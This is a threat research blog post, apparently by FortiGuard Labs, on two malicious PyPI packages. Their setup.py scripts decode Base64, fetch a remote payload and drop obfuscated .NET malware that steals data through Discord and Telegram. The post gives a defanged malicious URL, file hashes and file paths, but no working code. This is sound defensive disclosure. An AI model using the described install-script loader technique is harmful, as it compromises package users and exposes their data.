FortiGuard Labs Threat Research
The FortiGuard Labs team has discovered another 0-day attack in the PyPI packages (Python Package Index) by the malware authors ‘Portugal’ and ‘Brazil’ who published the packages ‘xhttpsp’ and ‘httpssp’. These two packages were discovered on January 31, 2023, by monitoring an open-source ecosystem. They were both published on January 27, 2023. Each included one version and an empty description, as shown below.
The two packages included the same malicious code in their setup.py installation script, which appears to be encoded with Base64.
When we decoded the encoded string, we found python code, some of which are shown below.
Within the string, we find an interesting URL, ‘http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx', which the malware reads and then writes to a file to execute.
This URL has not previously been detected by any other threat researchers.
When accessing the URL, we found heavily obfuscated code, shown below.
When we execute the decoded code from Figure 8, we notice that it drops a file to an arbitrary location with a random name and extension. This may be due to changes in the code every time the URL is refreshed. In this case, it drops the file to ‘%USER%\AppData\Local\Temp’ as ‘yzulmvnb.jpg’ and sets a registry key for auto-run.
When examining the dropped file, we observe that it is another script similar to the one shown in the URL contents.
Let’s try executing this dropped file.
One suspicious behavior when executing this file is that it drops a binary executable file to the ‘%USER%’ folder as ‘update.exe’.
A handful of vendors flag this dropped executable file as malicious (SHA 256):
618c11e03328eb0cc47ac21964479901dfaaa8a038e4145e247374169d6528f9
As shown in Figure 14, it then runs a Powershell, which is another suspicious behavior. It also copies itself to ‘%USER%\AppData\Roaming\Google’ as ‘Chrome.exe’ and sets autorun for this copied executable.
When we dive into the ‘update.exe’ code, we see a binary embedded within it, as shown below.
The embedded binary is a .dll file. As shown in the VirusTotal entry below, many vendors flag this binary, ‘Rdudkye.dll,’ as malicious (SHA 256):
19e9dbfe9df33f17664e780909054b48c62d3dd66e11f31f3a657d18ac4c752f
While the code is very obfuscated, some functions give clues about what it may do or its capabilities. We can see some interesting functions such as DiscordApi, TelegramApi, Inject, ProcessHollowing, RemoteThreadInjection, HiddenStartup, etc.
This blog shows that although the malicious python script may appear simple, it is more complex than it seems with multiple layers. With just a simple copy and paste of a brief code, malware authors are able to easily distribute malicious packages to steal or exfiltrate sensitive data through platforms such as Discord and Telegram. A good indication of a malicious package is when a lot of obfuscation is involved. This technique is quite common among malware authors, so it may be a wise idea for Python end users to check twice for this before using new packages.
FortiGuard Labs notified Python Package Index administrators about this malicious package, and they have confirmed that it has been taken down.
FortiGuard AntiVirus detects the malicious executables identified in this report as
update.exe: MSIL/Agent.OQX!tr.dldr
Rdudkye.dll: MSIL/Kryptik.AGJS!tr
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects the download URLs cited in this report as Malicious and blocks them.
update.exe
618c11e03328eb0cc47ac21964479901dfaaa8a038e4145e247374169d6528f9
Rdudkye.dll
19e9dbfe9df33f17664e780909054b48c62d3dd66e11f31f3a657d18ac4c752f
Malicious URLs
http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx
Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard AI-powered security services portfolio.